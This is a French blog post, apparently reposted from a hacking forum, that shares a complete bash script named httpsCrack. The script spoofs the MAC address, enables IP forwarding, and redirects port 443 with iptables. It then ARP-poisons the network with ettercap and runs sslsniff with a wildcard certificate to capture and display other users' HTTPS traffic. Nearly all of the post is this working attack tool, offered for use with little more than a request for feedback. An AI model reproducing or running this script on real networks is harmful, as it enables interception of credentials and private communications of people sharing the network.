samedi 9 janvier 2016

Script bash permettant de craquer le protocole HTTPS

Salut, je suis Rodrigue Daniel

Voilà je partage avec vous mon script bash permettant de sniffer les transactions issues du protocole SSL chiffrant
les requêtes http.
Voici le code de mon script

Code:


#!/bin/bash
#
# httpsCrack : Script de crack du protocole https
# Description : C'est un script qui automatise l'attaque de l'homme du milieu au niveau
#  de la couche transport et de la couche liaison de données afin d'interpréter les
#  requêtes https.
# Mon blog : rodriguedaniel.blogspot.com
# 07/01/2016
# Dépendances : macchanger, ettercap, sslsniff, iptables

set -u
clear

################################################################################
# Definitions des variables
RED='\e[1;31m'
YELLOW='\e[1;33m'
CYAN='\e[1;36m'
GREEN='\e[1;32m'
NC='\e[0m'

#---------------------------

erreur1=""
erreur2=""
dependance=""
interface=""

#################################################################################

echo -e $GREEN'

                _    _  _              ____                _
                | |__ | |_| |_ _ __  ___ / ___|_ __ __ _  ___| | __
                |  _ \| __| __|  _ \/ __| |  |  __/ _` |/ __| |/ /
                | | | | |_| |_| |_) \__ \ |___| | | (_| | (__|  <
                |_| |_|\__|\__| .__/|___/\____|_|  \__,_|\___|_|\_\
                                    |_|

'$NC
echo -e $GREEN"\t\t Description : Interpréteur des requêtes https "$NC
echo -e $GREEN"\t\t Auteur : Rodrigue Daniel (email : rodrigue_daniel@yahoo.com)\n"$NC
echo -e $GREEN"######################################################################################"$NC

# Vérification du mode root
if [[ $EUID -ne 0 ]]; then
        echo -e $RED"\n\t Erreur : ce programme doit être éxécuté en root.\n"$NC
        exit 1
fi

declare -a tabDependances=(macchanger ettercap sslsniff iptables)
erreur1="\n Erreur : Impossible de trouver le programme "
erreur2=", installez-le et réessayez.\n"
for dependance in "${tabDependances[@]}" ; do
        which $dependance > /dev/null
        if [ $? -eq 1 ]; then
                echo $RED$erreur1$dependance$erreur2$NC
                exit 1
        fi
done

################################################################################
# Exécution du crack

echo -e $YELLOW"\n-------> Détection des interfaces"$NC
echo -ne $CYAN"\n==> "
ifconfig | cut -d " " -f 1 | xargs echo
echo -ne "\n Entrez l'interface à utiliser : "
if ! read interface ; then
        echo -e $RED"\n Saisie Invalide."$NC
elif [ -z "$interface" ]; then
        echo -e $RED"\n Saisie Vide." && exit 1
else
        indexInterface=1
        verifInterface='ifconfig | cut -d " " -f 1 | xargs echo | cut -d " " -f $indexInterface '
        while eval $verifInterface >/dev/null ; do
                if [ "$interface" != "$(eval $verifInterface)" ] && [ "$(eval $verifInterface)" = "" ]; then
                        echo -e $RED"\n Erreur : interface inconnue. \n"$NC
                        exit 1
                elif [ "$interface" = "lo" ]; then
                        echo -e $RED"\n Oups : interface de bouclage. \n"$NC
                        exit 1
                elif [ "$interface" = "$(eval $verifInterface)" ]; then
                        break
                fi
                indexInterface=$((indexInterface + 1))
        done
fi
ipInterface=$(ifconfig $interface | grep "inet ad" | cut -d : -f 2 | awk '{print $1}')
if [ "$ipInterface" = "" ]; then
        echo -e $RED"\n Oups :  l'interface choisie n'a pas d'adresse IP. \n"$NC
fi

echo -e $YELLOW"\n-------> Masquage de l'adresse MAC de l'interface $interface"$NC
ifconfig $interface down
macchanger -A $interface > /dev/null
ifconfig $interface up
dhclient eth0 > /dev/null 2>&1
echo -e $GREEN"\t\t OK"$NC

echo -e $YELLOW"\n-------> Activation du routage"$NC
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e $GREEN"\t\t OK"$NC

echo -e $YELLOW"\n-------> Détournement des ports"$NC
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
echo -e $GREEN"\t\t OK"$NC

echo -e $YELLOW"\n-------> Empoisonnement ARP du réseau global"$NC
echo -ne "\n Entrez l'adresse IP de la passerelle d'accès à Internet : "
read passerelle
(ettercap -T -M arp:remote /$passerelle/ // >/dev/null 2>&1)&
echo -e $GREEN"\t\t OK"$NC

echo -e $YELLOW"\n-------> Empoisonnement SSL du réseau global"$NC
if (sslsniff -a -c /usr/share/sslsniff/certs/wildcard -s 10000 -w infoCrack >/dev/null 2>&1)& ; then
        echo -e $GREEN"\t\t OK"$NC
        echo -e $YELLOW"\n-------> Affichage des informations sensibles"$NC
        tail -n 50 -f infoCrack
else
        echo -e $RED"\n Oups :  echec de lancement du programme sslsniff.\n"$NC
        exit 1
fi

exit 0

Vos suggestions, vos critiques seront la bienvenue...
MERCI


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1mN8Kce
via IFTTT

Aucun commentaire:

Enregistrer un commentaire